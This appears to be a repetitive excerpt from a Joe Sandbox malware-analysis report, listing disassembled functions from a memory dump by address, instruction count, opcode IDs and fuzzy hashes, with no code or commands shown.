                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: ad90bb2a046436a457953d6ac08203a5285e976cedb6bdb9ff3bff75df9a3ac0
                                                                                                                                                                                                                      • Instruction ID: 064970f150b406813e405ee518f17ea4e11c409f13435a832cfb49683101e2d8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad90bb2a046436a457953d6ac08203a5285e976cedb6bdb9ff3bff75df9a3ac0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EA10F71B006169FDB64EF65C890BEAB7B5FF54324F104029EA05D7281EF78E809EB90
                                                                                                                                                                                                                      Function 01014500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c5f1663ab216173d0ca477c844f28a1949cc73c434190d1f4a3ed792a9c0d150
                                                                                                                                                                                                                      • Instruction ID: 2f3722d272a3c53c7217c231e88b94742c9c1096b3a5ca628d5eb6c1085dd7c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5f1663ab216173d0ca477c844f28a1949cc73c434190d1f4a3ed792a9c0d150
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8A1DD72A00601AFC712DF18C980B6ABBE9FF48744F050968FA85DB666C339E905CB91
                                                                                                                                                                                                                      Function 01012B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                      • Instruction ID: 478d991f06645878bd1eedcf6fc442a5de07a47836b5aa31ee5412b705ef1872
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FB15971E0061ADFDF59DFA8C880AADBBF5FF48300F248169E954AB358D734A941CB90
                                                                                                                                                                                                                      Function 00FC60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4880c274b718f8b60bd7b6d153397c099c474be1b47a0134fc7515b0013d1a1e
                                                                                                                                                                                                                      • Instruction ID: 7f89890a7c09b1b464921260193bdb03536111954c7085257650c2f8a16b6d4b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4880c274b718f8b60bd7b6d153397c099c474be1b47a0134fc7515b0013d1a1e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81919071D04216AFDF15CFA8D986FAEBBB5AB48710F15416DE610EB341D738ED00ABA0
                                                                                                                                                                                                                      Function 00F5E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 510b26d036525281457cef3b6959bf69b5be2a0a343884386fa4e2315917d488
                                                                                                                                                                                                                      • Instruction ID: e28f4bec422447a77f16bdd834f769b94eac805d450166e4d3fe7fd59baec6a3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 510b26d036525281457cef3b6959bf69b5be2a0a343884386fa4e2315917d488
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0915876E006159BD728DB18C840B7E77A5EF85725F18406AEE05DB381E738DE09F760
                                                                                                                                                                                                                      Function 00F96ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: acb1904f9c0957dc6e369ad7f6a96acd7613eb6e0161161dd6e25c3ff542de67
                                                                                                                                                                                                                      • Instruction ID: 5b9a52cc91896fe53a68cd413e2ad6bd7ea702a931eb1748cb4f3110b7dff66d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acb1904f9c0957dc6e369ad7f6a96acd7613eb6e0161161dd6e25c3ff542de67
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C181B3B1E0061A9BEF18CF69C950ABEB7F9FB48710F10852EE455E7640E734E940DBA4
                                                                                                                                                                                                                      Function 0100AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                      • Instruction ID: 8a412ab75cdb0da09f98b55c15df74b742089cbf3b8c6afeb40ea132dd4359df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27817E31B10709DFEF1ADF58C890AAEBBF2AF84310F198569D9569B385D734E901CB50
                                                                                                                                                                                                                      Function 00F7E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b68078d9470808ef870cffa2f6211210ccac48a52a78bf05706dfdae6b71c937
                                                                                                                                                                                                                      • Instruction ID: 9e28c6767cdd36b441b0fb25ced0c27f56eeb33968cce439c03a28fc093aecc2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b68078d9470808ef870cffa2f6211210ccac48a52a78bf05706dfdae6b71c937
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C818071E00609AFDB25DFA5C880BEEBBF9FF48354F10842AE559A7250D770AC05EB60
                                                                                                                                                                                                                      Function 00F5C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 667c2bdcf417f54e099bdbc65cdcc2d1683b3a0a8bcf1dd9165d69f5507f3b46
                                                                                                                                                                                                                      • Instruction ID: a43db1b76a89c69ebbf6173f7e41b0d5a721716e902fa4e688a14612715d62ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 667c2bdcf417f54e099bdbc65cdcc2d1683b3a0a8bcf1dd9165d69f5507f3b46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D71EDB5C00229DFCB258F58D8907BEBBB4FF59710F24411AE982AB390D7759905EBE0
                                                                                                                                                                                                                      Function 00FF47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 11313afd1fd88794671d868427d3236e1403664763591b6dd6d180ab8118325a
                                                                                                                                                                                                                      • Instruction ID: cfb76eb587b3f8187316ddaf30cade293c45f90651e3a9f553e8b6fc8ab86cdc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11313afd1fd88794671d868427d3236e1403664763591b6dd6d180ab8118325a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE71B571D00208EFCB20DF95D945AABBBFCFF81710F10415AE654A7269C77AAE40EB54
                                                                                                                                                                                                                      Function 00F5260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fbccd13de9c870da76284dd65bea227ae7b633582d8f2794d3395fb37c9a7d46
                                                                                                                                                                                                                      • Instruction ID: d12d82ade27548770bd85ebed4b50b71ad025a77de1b2ef654ce1673894dd92b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbccd13de9c870da76284dd65bea227ae7b633582d8f2794d3395fb37c9a7d46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D771C272A046418FC751DF28C880B2AB7E5FF89311F0486A9ED59CB352DB38DC49DB91
                                                                                                                                                                                                                      Function 00FD62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 07f7ef436ffdcc2a2ec41dd5b742aa65b73e3e96533278ecc548f95f2f42190a
                                                                                                                                                                                                                      • Instruction ID: e9264e4ef1017c315bf583c72a7c1e0a0b56096b7b3ca7b2d18822995ef9aaad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07f7ef436ffdcc2a2ec41dd5b742aa65b73e3e96533278ecc548f95f2f42190a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D71FE32600A00AFDB31DF18CC45F5AB7E6EB40720F29442AE656CB3A1D779E944EB50
                                                                                                                                                                                                                      Function 00FC035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                      • Instruction ID: 5390d7395e33dfc536c5bb6deaec1da37cd3ce4714e6aaff9f73c424aee0f146
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17716F71A00619EFCB10DFA9CA45FEEBBB8FF48700F144569E905A7251DB34EA06DB50
                                                                                                                                                                                                                      Function 00F48AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1674444c952554c000b54379584e21eded964ef23dad4d62bba90f50443bf92e
                                                                                                                                                                                                                      • Instruction ID: 28dd77b07434c7359bbdb6b3332147ff99374e358bdd9504b4f1ec194201b425
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1674444c952554c000b54379584e21eded964ef23dad4d62bba90f50443bf92e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4681A0B2B043158FDB24CF98D584BADB7F5FF89324F194129D800AB291C7799D41EB90
                                                                                                                                                                                                                      Function 01018324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0ee25693a113e8579f5f0608ee81ce255f5fa59592c3626238f596f3e96befa1
                                                                                                                                                                                                                      • Instruction ID: e915fef48b13391c912a448e75cdf0160b070fd71b5c29908b5ac9612fe79dea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ee25693a113e8579f5f0608ee81ce255f5fa59592c3626238f596f3e96befa1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9710B71E00209AFDB15DF94CC81FEEBBB9FB04350F10815AFA51A7294D778AA05CB90
                                                                                                                                                                                                                      Function 00FFA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c5242c47d1e45571f85321d6c96435d48a9f0b61947dda86e8be3f67839c738e
                                                                                                                                                                                                                      • Instruction ID: 3eb38867e22dfae64f960f208dd2984939536b5286a255a06b792bc909d5d25f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5242c47d1e45571f85321d6c96435d48a9f0b61947dda86e8be3f67839c738e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F51BEB2904616AFD312DF68C884B6BB7E8EFC5750F010929BB44DB160E6B5ED0497A3
                                                                                                                                                                                                                      Function 00FE8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6542686ece597a4840f2c9020b74d8643ffdda8c89dbfea67e83e6209cb89459
                                                                                                                                                                                                                      • Instruction ID: a6ea347e349d95478edc3facf73ff82e5810796bf94faf596bff6ceb8467e610
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6542686ece597a4840f2c9020b74d8643ffdda8c89dbfea67e83e6209cb89459
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB51CF709007459FD721EF56C880AABFBF8FF94750F20461EE19A576E1CBB0A942EB50
                                                                                                                                                                                                                      Function 00F7E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: e76f75525238e219bd09d4a4f4b5ce2d158161a110e2d8aefc2d03759185a697
                                                                                                                                                                                                                      • Instruction ID: 8b0d54eb8b8f78462dff327f17dc6c559b715998c9195c8851151eb348ec0649
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e76f75525238e219bd09d4a4f4b5ce2d158161a110e2d8aefc2d03759185a697
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D518B72600A04DFCB21EF69C984EAAB3F9FF08794F50046AE64597261D738EE44EB51
                                                                                                                                                                                                                      Function 00FE4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b8f2def148061a01c8fdab39ed211a6b7790ccac6809050113550609f859d2c7
                                                                                                                                                                                                                      • Instruction ID: e35161d684b5d53e3c55d45399ba2891bc265a9b1ce4d2f8e4355aaa372ba83c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8f2def148061a01c8fdab39ed211a6b7790ccac6809050113550609f859d2c7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE5189716083818FD750DF2AC881A6BB7E5BFC8718F444A2EF499C7250EB34E905EB56
                                                                                                                                                                                                                      Function 00F645B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                      • Instruction ID: d415c5c775959ae610941c17233a30429ced1996f54e9920dbbcc18c89330c83
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E519D71E0061AABCF15EF94C841BEEBBB9AF45754F14406AE901EB341D734EE44DBA0
                                                                                                                                                                                                                      Function 00FCE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                                                      • Instruction ID: 626bfdbfdca6037a2bf234b107d09889ddd73c297d816f57a39215e06c8b032d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E151A732D0021BAFDF209A90CE87FBEB775AF40324F15466DE91267191D7389E44EB90
                                                                                                                                                                                                                      Function 01008B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bf6334aaab7dfd5cc816b6dcd3a8a305cf843be333b22c539f4b42389ed9d6c3
                                                                                                                                                                                                                      • Instruction ID: ed885f38273f1dd1fc91fa035c73132b8ca64116796a1a0321cddbb755137017
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf6334aaab7dfd5cc816b6dcd3a8a305cf843be333b22c539f4b42389ed9d6c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0641B570B01A159BF66BDB2DC895F7BBBEABF90220F04C15AF995872C1DB34D801C691
                                                                                                                                                                                                                      Function 00FCCBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6d3375be1cb82a63f71c1d44a53cbeb66f482311733bd747107f94a19859345b
                                                                                                                                                                                                                      • Instruction ID: 84cc3a7a41dec56995c80648d4016e0f23808d6d3bcedb21153568eb05256456
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d3375be1cb82a63f71c1d44a53cbeb66f482311733bd747107f94a19859345b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9851E371D00216DFCB20DFA5CA81E9EBBB9FF48364B114529E55AA3301D735AE41EBD0
                                                                                                                                                                                                                      Function 00F7A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3c57e7d9c39dc9729a3a828c7b93d0466fd484f01803371ae1ad23067be15bfc
                                                                                                                                                                                                                      • Instruction ID: 845acf54e2b2e8c3ccf2af2cbeb75ade6d6d877e2a49940fd58462b91c36ee7b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c57e7d9c39dc9729a3a828c7b93d0466fd484f01803371ae1ad23067be15bfc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44412B767006009BCB24EF699C92B6E3769AB44718F05402EFD45DF242D7FE9C10AB52
                                                                                                                                                                                                                      Function 0100A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                      • Instruction ID: a748f4d613532915f4e8d7ed6438024074882df7a7ac657fb6e2cbf9f7f367be
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A41B7317047169FE726CE18C980A6AB7E9FF85210F05466DEA9687281EB34ED54C790
                                                                                                                                                                                                                      Function 00F701F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
